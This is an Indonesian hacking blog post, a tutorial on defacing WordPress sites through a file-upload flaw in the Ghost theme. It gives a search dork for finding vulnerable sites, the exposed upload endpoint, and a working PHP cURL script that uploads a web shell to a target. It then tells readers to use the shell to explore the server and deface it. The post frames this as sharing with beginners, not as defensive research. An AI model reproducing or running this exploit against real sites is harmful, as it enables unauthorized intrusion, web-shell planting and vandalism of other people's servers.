Jumat, 04 Maret 2016

Tutorial Deface dengan Teknik WordPress Ghost Theme File Upload

Hallo fans .-. Nuenomaru disini.
diPostingan sebelumnya Nue share Deface Website Phising dengan Hidden Uploader.
Sekarang Nue akan Share Tutorial Deface dengan Exploit WordPress Ghost Theme File Upload *ini exploit lama sih wkwkw
exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 


Lanjotz
Edited By: OepilCore

pertama buka xamppnya dlu, pastikan tanda ; pada curl di php.ini sudah di hapus.
Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini

Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )


Dork: inurl:wp-content/themes/Ghost/
(kembangin lg, gunakan imajinasi bokever agan, biar dpt yg vuln and verawan)

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

3. Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}

Vuln boss

4. Buat File Baru Berekstensi .php Contoh ghost.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ghost.php tadi

<?php

$uploadfile="namashell.php";

$ch = curl_init("target.co.li/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");

curl_setopt($ch, CURLOPT_POST, true);  

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";


?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php



7. jika sukses , akan muncul nama shell sobat di CMD,dan akan keluar lengkap link akses shell ente



8. Shell Akses: 

www.target.co.li/wp-content/uploads/settingsimages/namashell.php

Done~ ..

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))


cuma nitip file Umz :'(

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 0day












foto hanya pemanis di thread :'v















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

0 komentar:

Posting Komentar

 

ande ande lumoet Template by Ipietoon Cute Blog Design